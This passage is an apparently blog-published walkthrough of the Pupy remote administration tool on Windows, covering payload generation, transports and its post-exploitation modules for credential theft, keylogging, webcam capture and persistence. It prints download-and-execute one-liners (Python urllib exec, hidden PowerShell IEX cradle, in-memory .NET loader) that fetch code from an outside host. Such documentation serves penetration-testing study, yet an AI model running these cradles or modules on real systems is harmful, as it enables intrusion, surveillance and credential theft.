Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Using docker\u003C\u002Fh3>\u003Cp>Documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fwiki\u002FInstallation\u003C\u002Fp>\u003Ch3>2. Direct installation\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>git clone --recursive https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u003Cbr>cd pupy\u003Cbr>python create-workspace.py -DG pupyws\u003Cbr>pupyws\u002Fbin\u002Fpupysh\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using the -DG parameter will download template files from https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Freleases\u002Fdownload\u002Flatest\u002Fpayload_templates.txz\u003C\u002Fp>\u003Ch2>0x03 Supported payload file types\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After starting pupy, enter gen -h to get instructions for generating payload files, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017291528_0_db8aa684db-1.jpeg\">\u003C\u002Fp>\u003Cp>Here is a detailed introduction one by one\u003C\u002Fp>\u003Ch3>1.client\u003C\u002Fh3>\u003Cp>Generate files in EXE format\u003C\u002Fp>\u003Cp>Example command for generating a 64-bit EXE file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f client -A x64\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will read the template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, add configuration information, and generate the final EXE file\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The template file name corresponding to the above command is pupyx64.exe. The download link for the template file is: https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Freleases\u002Fdownload\u002Flatest\u002Fpayload_templates.txz\u003C\u002Fp>\u003Ch3>2.py\u003C\u002Fh3>\u003Cp>Generate a fully packaged Python file (all dependencies are packaged and executed from memory)\u003C\u002Fp>\u003Cp>Example command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will generate a Python file with content in the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import zlib,marshal;exec marshal.loads(zlib.decompress('xxxxxxxxx')\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Where 'xxxxxxxxx' is the encrypted content\u003C\u002Fp>\u003Cp>The encryption method roughly involves serializing the code using marshal.dumps, followed by operations such as offset and XOR. For the specific encryption algorithm, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fblob\u002F5b9529a0ea07bb4246a57bfb1c1129010c948931\u002Fpupy\u002Fpupylib\u002Futils\u002Fobfuscate.py#L9\u003C\u002Fp>\u003Cp>To cancel the encryption process and obtain the source file, add the --debug parameter. Example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py --debug\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Corresponding code location: https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fblob\u002F5b9529a0ea07bb4246a57bfb1c1129010c948931\u002Fpupy\u002Fpupylib\u002Fpayloads\u002Fpy_oneliner.py#L43\u003C\u002Fp>\u003Cp>The code logic is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if debug:\u003Cbr>    return payload\u003Cbr>return compress_encode_obfs(payload, main=True)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To run this Python file in a Windows Python environment, the following modules also need to be installed on Windows:\u003C\u002Fp>\u003Cul>\u003Cli>pywin32\u003C\u002Fli>\u003Cli>pycryptodome\u003C\u002Fli>\u003Cli>Crypto\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The Crypto package needs to be downloaded from http:\u002F\u002Fwww.voidspace.org.uk\u002Fpython\u002Fmodules.shtml#pycrypto\u003C\u002Fp>\u003Ch3>3.pyinst\u003C\u002Fh3>\u003Cp>Generate Python files compatible with pyinstaller\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f pyinst\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Difference from gen -f py: adds some header files to facilitate converting Python scripts to exe files using pyinstaller\u003C\u002Fp>\u003Cp>The usage of pyinstaller was introduced in the previous article 'Custom Script Development in Local Password Viewer LaZagne'\u003C\u002Fp>\u003Ch3>4.py_oneliner\u003C\u002Fh3>\u003Cp>Download and execute Python code from a server via the urllib library\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output the download and execute code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python -c 'import urllib;exec urllib.urlopen(\"http:\u002F\u002F192.168.1.1:9000\u002Fa0py9Yz5pi\u002FSg11A11q2J\").read()'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>5.ps1\u003C\u002Fh3>\u003Cp>Generate startup code in powershell format, which first starts a Powershell process and then loads the dll within the Powershell process\u003C\u002Fp>\u003Cp>Command example for generating 32-bit files:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f ps1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command reads the DLL template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, adds configuration information and obfuscated Invoke-ReflectivePEInjection code, ultimately achieving DLL loading within the Powershell process.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The corresponding template file name for the above command is pupyx86.dll.\u003C\u002Fp>\u003Ch3>6.ps1_oneliner\u003C\u002Fh3>\u003Cp>Downloads and executes Powershell code from a server via IEX(New-Object Net.WebClient).DownloadString.\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f ps1_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Outputs the download-and-execute code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell.exe -w hidden -noni -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http:\u002F\u002F192.168.1.1:9000\u002FDfsP5d2GPG\u002FxDrhpNdNTU');\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Outputs the base64-encoded execution code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell.exe -w hidden -noni -nop -enc xxxxxxxxxxxxxxxxxxxx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>7.rubber_ducky\u003C\u002Fh3>\u003Cp>Generates a Rubber Ducky script and an inject.bin file.\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f rubber_ducky\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>8.csharp\u003C\u002Fh3>\u003Cp>Generate C# file (.cs format)\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f csharp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will read the DLL template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, add configuration information, and use Casey Smith's PELoader to load the PE file from memory\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The corresponding template file name for the above command is pupyx86.dll\u003C\u002Fp>\u003Cp>For compilation and usage methods of the C# file, refer to the previous article 'Loading PE Files from Memory via .NET'\u003C\u002Fp>\u003Ch3>9..NET\u003C\u002Fh3>\u003Cp>Generate C# file (.cs format) and compile it with mono, ultimately producing an exe format file\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f .NET\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Requires installation of the mono development environment; the Kali installation command is apt-get install mono-mcs\u003C\u002Fp>\u003Cp>For usage of mono, refer to the previous article 'Executing Shellcode via Mono (Cross-platform .NET Runtime Environment)'\u003C\u002Fp>\u003Cp>This command adds the functionality of compiling with mono on top of gen -f csharp\u003C\u002Fp>\u003Ch3>10..NET_oneliner\u003C\u002Fh3>\u003Cp>Load .NET assemblies from memory via PowerShell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f .NET_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output PowerShell code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell -w hidden -enc \"xxxxxxxxxxxxxx\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command adds the functionality of loading .NET assemblies from memory via PowerShell on top of gen -f .NET\u003C\u002Fp>\u003Cp>The implementation code for loading .NET assemblies from memory via PowerShell is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[Reflection.Assembly]::Load(\"\"(new-object net.webclient).DownloadData(\"\"'http:\u002F\u002F{link_ip}:{port}{landing_uri}')).GetTypes()[0].GetMethods(\"\")[0].Invoke($null,@())\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The previous article 'Analysis of Exploiting .NET Assembly Loading from Memory (Assembly.Load)' analyzed methods for loading .NET assemblies from memory\u003C\u002Fp>\u003Ch3>Additional: Extra parameters\u003C\u002Fh3>\u003Cp>For the generated launcher files, the following parameters are also supported:\u003C\u002Fp>\u003Cul>\u003Cli>Whether to compress\u003C\u002Fli>\u003Cli>Whether to use system proxy\u003C\u002Fli>\u003Cli>Set connection count and interval time\u003C\u002Fli>\u003Cli>Set Python script to execute before startup\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x04 Supported Connection Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The following four types are supported:\u003C\u002Fp>\u003Cul>\u003Cli>bind, bind port, used as a forward connection\u003C\u002Fli>\u003Cli>auto_proxy, retrieve possible SOCKS\u002FHTTP proxy lists and use them, retrieval methods include: registry, WPAD request, gnome settings, environment variable HTTP_PROXY\u003C\u002Fli>\u003Cli>dnscnc, DNS protocol? (This feature is currently untestable)\u003C\u002Fli>\u003Cli>connect, default method, reverse connect to server\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Supported Communication Protocols\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Obtain list via command gen -l\u003C\u002Fp>\u003Cp>Documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fwiki\u002FGet-Started#transport\u003C\u002Fp>\u003Cp>Currently supports the following categories:\u003C\u002Fp>\u003Cul>\u003Cli>obfs3\u003C\u002Fli>\u003Cli>http\u003C\u002Fli>\u003Cli>ssl\u003C\u002Fli>\u003Cli>ecm\u003C\u002Fli>\u003Cli>tcp_cleartext\u003C\u002Fli>\u003Cli>dfws\u003C\u002Fli>\u003Cli>rsa\u003C\u002Fli>\u003Cli>udp_secure\u003C\u002Fli>\u003Cli>kc4\u003C\u002Fli>\u003Cli>ec4\u003C\u002Fli>\u003Cli>ws\u003C\u002Fli>\u003Cli>scramblesuit\u003C\u002Fli>\u003Cli>udp_cleartext\u003C\u002Fli>\u003Cli>ssl_rsa\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Communication protocols of the above categories can be customized, modification location: pupy\u002Fpupy\u002Fnetwork\u002Ftransports\u002F\u003Ctransport_name>\u002Fconf.py\u003C\u002Ftransport_name>\u003C\u002Fp>\u003Ch2>0x06 Post-Exploitation Module Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Common Commands:\u003C\u002Fp>\u003Cp>Set listening port: listen -a ssl 8443\u003C\u002Fp>\u003Cp>View sessions: sessions\u003C\u002Fp>\u003Cp>Switch session: sessions -i \u003Cid>\u003C\u002Fid>\u003C\u002Fp>\u003Cp>Terminate session: sessions -k \u003Cid>\u003C\u002Fid>\u003C\u002Fp>\u003Cp>Usage example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017322122_1_72a62add13-1.jpeg\">\u003C\u002Fp>\u003Cp>After obtaining a session, enter help -M to display supported post-exploitation modules. Here, these modules are categorized and their functions introduced one by one\u003C\u002Fp>\u003Ch3>1. Privilege Escalation\u003C\u002Fh3>\u003Cp>(1) Use beroot to obtain information for privilege escalation, module: beroot\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FAlessandroZ\u002FBeRoot\u003C\u002Fp>\u003Cp>(2) Use WinPwnage to attempt privilege escalation, module: bypassuac\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002Frootm0s\u002FWinPwnage\u003C\u002Fp>\u003Cp>(3) Switch to SYSTEM privileges, module: getsystem\u003C\u002Fp>\u003Cp>(4) Use Windows PowerShell ADIDNS\u002FLLMNR\u002FmDNS\u002FNBNS spoofer\u002Fman-in-the-middle tool Inveigh, module: inveigh\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FKevin-Robertson\u002FInveigh\u003C\u002Fp>\u003Ch3>2. Processes\u003C\u002Fh3>\u003Cp>(1) List\u002Fimpersonate process tokens, module: impersonate\u003C\u002Fp>\u003Cp>For token exploitation methods, refer to the previous article 'Penetration Techniques - Token Theft and Exploitation'\u003C\u002Fp>\u003Cp>(2) Obtain current privileges, module: getprivs\u003C\u002Fp>\u003Cp>For privilege exploitation methods, refer to the previous article 'Penetration Techniques - Exploitation of Nine Windows Privileges'\u003C\u002Fp>\u003Cp>(3) Obtain the parent process of the current process, module: getppid\u003C\u002Fp>\u003Cp>For privilege switching via parent processes, refer to the previous article 'Penetration Techniques - Switching from Admin to System Privileges'\u003C\u002Fp>\u003Ch3>3. Credential Acquisition\u003C\u002Fh3>\u003Cp>(1) Use Lazagne to obtain credentials, module: lazagne\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FAlessandroZ\u002FLaZagne\u002F\u003C\u002Fp>\u003Cp>The previous article 'Custom Script Development in the Local Password Viewer Tool LaZagne' introduced LaZagne\u003C\u002Fp>\u003Cp>(2) Export local user hashes from the registry, module: creddump\u003C\u002Fp>\u003Cp>For related details, you can refer to the previous article 'Penetration Techniques - Obtaining Local User Hashes via the SAM Database'.\u003C\u002Fp>\u003Cp>(3) Monitor memory and search for plaintext credentials, module: loot_memory\u003C\u002Fp>\u003Cp>Once enabled, it will continuously monitor memory.\u003C\u002Fp>\u003Cp>(4) Dump printable strings from process memory for further analysis, module: memstrings\u003C\u002Fp>\u003Cp>Can target specified processes; output format is a text file.\u003C\u002Fp>\u003Ch3>4. Network-related\u003C\u002Fh3>\u003Cp>(1) Send Get\u002FPost requests via HTTP protocol, module: http\u003C\u002Fp>\u003Cp>(2) TCP port scanning, module: port_scan\u003C\u002Fp>\u003Cp>(3) Port forwarding and SOCKS proxy, module: forward\u003C\u002Fp>\u003Cp>(4) Packet capture, module: tcpdump\u003C\u002Fp>\u003Cp>(5) UPnP operations, module: igd\u003C\u002Fp>\u003Cp>(6) Obtain certificates from servers, module: x509\u003C\u002Fp>\u003Ch3>5. Screen control\u003C\u002Fh3>\u003Cp>(1) Module for controlling the target screen via a browser: rdesktop\u003C\u002Fp>\u003Cp>After loading, you can control the target's screen through a browser, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017371161_2_d40bdf2647-1.jpeg\">\u003C\u002Fp>\u003Cp>Not only can view screen content, but also send mouse and keyboard messages\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Remote Desktop Protocol (RDP) is not used here\u003C\u002Fp>\u003Cp>(2) Using Remote Desktop Protocol (RDP), module: rdp\u003C\u002Fp>\u003Cp>Can be used to enable or disable remote desktop connections, and also supports verifying credentials of remote hosts\u003C\u002Fp>\u003Ch3>6. Monitoring\u003C\u002Fh3>\u003Cp>(1) Keyboard and clipboard logging, module: keylogger\u003C\u002Fp>\u003Cp>(2) Record mouse clicks and capture surrounding areas, module: mouselogger\u003C\u002Fp>\u003Cp>(3) Screenshot, module: screenshot\u003C\u002Fp>\u003Cp>(4) Microphone recording, module: record_mic\u003C\u002Fp>\u003Cp>(5) Webcam capture, module: webcamsnap\u003C\u002Fp>\u003Ch3>7. Obtain system information\u003C\u002Fh3>\u003Cp>(1) View logs, module: logs\u003C\u002Fp>\u003Cp>Different types correspond to different colors, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017394493_3_28feb5695b-1.jpeg\">\u003C\u002Fp>\u003Cp>(2) Registry, module: reg\u003C\u002Fp>\u003Cp>Includes query, add, delete, modify, and search operations\u003C\u002Fp>\u003Cp>Different types correspond to different colors, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017437243_4_0c6fa9f635-1.jpeg\">\u003C\u002Fp>\u003Cp>(3) List local and remote shared folders and permissions, module: shares\u003C\u002Fp>\u003Cp>(4) View currently logged-in users, module: w\u003C\u002Fp>\u003Cp>(5) Retrieve service information, module: services\u003C\u002Fp>\u003Cp>(6) Get time, module: date\u003C\u002Fp>\u003Cp>(7) Retrieve EC2\u002FDigitalOcean metadata, module: cloudinfo\u003C\u002Fp>\u003Cp>(8) View and modify environment variables, module: env\u003C\u002Fp>\u003Cp>(9) Virtual machine detection, module: check_vm\u003C\u002Fp>\u003Cp>Supports identification of the following virtual machines:\u003C\u002Fp>\u003Cul>\u003Cli>Hyper-V\u003C\u002Fli>\u003Cli>VMWare\u003C\u002Fli>\u003Cli>Virtual PC\u003C\u002Fli>\u003Cli>Virtual Box\u003C\u002Fli>\u003Cli>Xen Machine\u003C\u002Fli>\u003Cli>Qemu machine\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Identification method: Query the registry\u003C\u002Fp>\u003Ch3>8. Execute Python commands\u003C\u002Fh3>\u003Cp>(1) Execute a single command, module: pyexec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pyexec -c \"import platform;print platform.uname()\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Execute Python commands in an interactive shell, module: pyshell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pyshell\u003Cbr>import platform\u003Cbr>print platform.uname()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Load Python package, module: load_package\u003C\u002Fp>\u003Ch3>9. Execute CMD Commands\u003C\u002Fh3>\u003Cp>(1) Execute CMD commands via subprocess, module: shell_exec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>shell_exec whoami\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Simple popen call executed on a thread (slower but safer), module: pexec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pexec whoami\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Interactive shell, module: interactive_shell\u003C\u002Fp>\u003Cp>Modified from winpty\u003C\u002Fp>\u003Cp>(4) Execute shellcode, module: shellcode_exec\u003C\u002Fp>\u003Cp>(5) Execute file in memory, module: memory_exec\u003C\u002Fp>\u003Ch3>10. Execute CMD Commands Remotely\u003C\u002Fh3>\u003Cp>Use smbexec\u002Fwmiexec to achieve remote command execution, module: psexec\u003C\u002Fp>\u003Cp>Supports using hash\u003C\u002Fp>\u003Ch3>11. Maintain Persistence\u003C\u002Fh3>\u003Cp>(1) Persistence, module: persistence\u003C\u002Fp>\u003Cp>For more methods, refer to: an open-source project\u003C\u002Fp>\u003Cp>(2) Duplicate current session, module: duplicate\u003C\u002Fp>\u003Cp>(3) Process migration, module: migrate\u003C\u002Fp>\u003Ch3>12. mimikatz\u003C\u002Fh3>\u003Cp>(1) Load mimikatz in memory, execute single command, module: mimikatz\u003C\u002Fp>\u003Cp>(2) Load mimikatz in memory, interactive, module: mimishell\u003C\u002Fp>\u003Ch3>13. powerview\u003C\u002Fh3>\u003Cp>(1) Direct invocation, module: powerview\u003C\u002Fp>\u003Cp>(2) Rewritten in Python, module: pywerview\u003C\u002Fp>\u003Ch3>14. File operations\u003C\u002Fh3>\u003Cp>(1) Upload, module: upload\u003C\u002Fp>\u003Cp>(2) Download, module: download\u003C\u002Fp>\u003Cp>(3) View file or folder attributes, module: stat\u003C\u002Fp>\u003Cp>(4) Edit file, module: edit\u003C\u002Fp>\u003Cp>(5) Write to file, module: write\u003C\u002Fp>\u003Cp>(6) Search files using Windows Search Index, module: isearch\u003C\u002Fp>\u003Cp>(7) Search for characters in all files under a specified directory, module: search\u003C\u002Fp>\u003Cp>(8) Access file shares via SMB protocol, module: smb\u003C\u002Fp>\u003Cp>(9) Connect to remote shared directory and search for files, module: smbspider\u003C\u002Fp>\u003Ch3>15. SSH client\u003C\u002Fh3>\u003Cp>(1) Connect to remote SSH server and execute commands, module: ssh\u003C\u002Fp>\u003Cp>(2) Connect to remote SSH server for a full interactive session, module: sshell\u003C\u002Fp>\u003Ch3>16. Outlook\u003C\u002Fh3>\u003Cp>Interact with the target user's Outlook session, module: outlook\u003C\u002Fp>\u003Ch3>17. Compression and decompression\u003C\u002Fh3>\u003Cp>Zip compression and decompression, module: zip\u003C\u002Fp>\u003Ch3>18. Lock screen\u003C\u002Fh3>\u003Cp>Module: lock_screen\u003C\u002Fp>\u003Ch3>19. View information of the connected back session\u003C\u002Fh3>\u003Cp>(1) Obtain network information for all sessions, module: netstat\u003C\u002Fp>\u003Cp>(2) Obtain information for the current session, module: get_info\u003C\u002Fp>\u003Cp>(3) View acquired credential information, command: creds\u003C\u002Fp>\u003Cp>(4) View server configuration information, command: config\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the startup file types, connection methods, and communication protocols of Pupy on the Windows platform, categorizes its post-exploitation modules, and describes the functionality of each one.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1241,"Onedaysec",8,"published","2026-02-02T07:51:00.264Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Pupy Exploitation Analysis: Windows Features & Payloads","Pupy exploitation, Windows post-exploitation, payload generation, remote administration tool, Python RAT",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4,47],411,410,409,407,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.573Z","2026-07-23T16:01:31.087Z","draft","2026-07-23T16:06:00.382Z"]